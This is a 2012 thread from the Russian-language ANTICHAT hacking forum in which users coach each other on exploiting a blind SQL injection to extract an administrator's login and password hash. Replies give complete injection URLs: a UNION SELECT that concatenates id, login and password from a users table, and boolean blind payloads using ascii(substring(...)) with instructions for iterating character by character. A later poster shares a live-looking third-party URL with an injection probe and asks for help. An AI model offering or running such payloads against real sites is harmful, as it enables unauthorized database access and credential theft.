ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.09.2012, 17:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
36927
Репутация:
5
|
|
Сообщение от [c0de
"]
[c0de] said:
Есть слепая blind sql инъекция
Проверил
test.ru/forum/viewtopic.php?id=1' and 2-1='1 true
test.ru/forum/viewtopic.php?id=1' and 2-1='2 false
Известно название таблицы, полей
Так же известно название таблицы с юзерами "users_am"
и наличие полей "id" , "login", "password"
Известен id и логин админа
Возникает вопрос, как достать хэш пароля?
в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.
mysql?
|
|
|
|
29.09.2012, 17:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
m00c0w
да
|
|
|
|
29.09.2012, 17:37
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от [c0de
"]
[c0de] said:
Есть слепая blind sql инъекция
Проверил
test.ru/forum/viewtopic.php?id=1' and 2-1='1 true
test.ru/forum/viewtopic.php?id=1' and 2-1='2 false
Известно название таблицы, полей
Так же известно название таблицы с юзерами "users_am"
и наличие полей "id" , "login", "password"
Известен id и логин админа
Возникает вопрос, как достать хэш пароля?
в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.
test.ru/forum/viewtopic.php?id=1'+and+1=2+union+all+slelect+conc at(id,0x3a,login,0x3a,password)+from+users_am+limi t+0,1+and+1='1
А вообще если у тебя есть login и password - зачем тебе хэш ??
|
|
|
29.09.2012, 17:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
BigBear
Так нету пароля, известно только что поле есть password а там хэш пароля
Запрос не работает к сожалению. Страница меняется
Суть такая, проверял наличие таблиц, если такая есть => страница без изменений
Нету => пропадают стили, скрипты
В запросе пробелы где нужно убрал если что.
А куда запрос должен был то вывестись? Скуля то слепая
|
|
|
|
29.09.2012, 18:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
3098
Репутация:
3
|
|
Сообщение от None
В запросе пробелы где нужно убрал если что.
а
Сообщение от None
+slelect+
исправил на select ?
|
|
|
|
29.09.2012, 18:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Red[S1]
да
Все равно не катит
|
|
|
|
29.09.2012, 19:38
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от [c0de
"]
[c0de] said:
BigBear
Так нету пароля, известно только что поле есть password а там хэш пароля
Запрос не работает к сожалению. Страница меняется
Суть такая, проверял наличие таблиц, если такая есть => страница без изменений
Нету => пропадают стили, скрипты
В запросе пробелы где нужно убрал если что.
А куда запрос должен был то вывестись? Скуля то слепая
Да, с slelect очепятался, бывает =)
если блайнд то тут 2 вариант на выбор
Код:
Code:
test.ru/forum/viewtopic.php?id=1'+and+ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+0,1),1,1)>50+and+1='1
или
Код:
Code:
test.ru/forum/viewtopic.php?id=1+and+1=IF(ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+0,1),1,1)>50,1,2)+and+1='1
Цветом выделены динамические переменные
1ая отвечает за номер записи в бд users_am (по дефолту идёт считывание данных из 1-ой записи)
2ая отвечает за порядок извлекаемого символа из строки id:login: password (по дефолту идёт извлечение первого символа)
3ья отвечает за код ascii символа в десятичном формате (Dec), по нему будешь ориентироваться, какой символ стоит на каком месте
Если в процессе будешь получить НЕ ПУСТУЮ страницу - значит запрос получился верный.
То есть в id:login: password на {1} строке таблицы users_am на позиции {2} находится ascii символ {3}
Знаю, что сложнова-то для восприятия, но как мог так помог =)
|
|
|
|
29.09.2012, 20:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by=1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?
|
|
|
|
29.09.2012, 20:11
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Halahack
Halahack said:
нашел дырку, начинаю выводить столбцы, но order+by и group+by не работают. ввожу сколько угодно , но ошибки нету даже на order+by=1000000000000+--+ пробовал коментарии менять на /* { %23 таже фигня. Что делат ьскажите пожалуйста ?
К таким вопросам обычно прилагается ссылка на сайт для помощи.
(с) Телепаты в отпуске !!!
|
|
|
|
29.09.2012, 21:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
К таким вопросам обычно прилагается ссылка на сайт для помощи.
(с) Телепаты в отпуске !!!
http://lonyung.com.cn/buy.php?id=`76
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [c0de]](/avatars/avatar.jpg?3289486){kind=avatar}
![Аватар для [c0de]](/avatars/avatar.jpg?3289530){kind=avatar}
![Аватар для [c0de]](/avatars/avatar.jpg?3289586){kind=avatar}
Похожие темы
Линейный вид
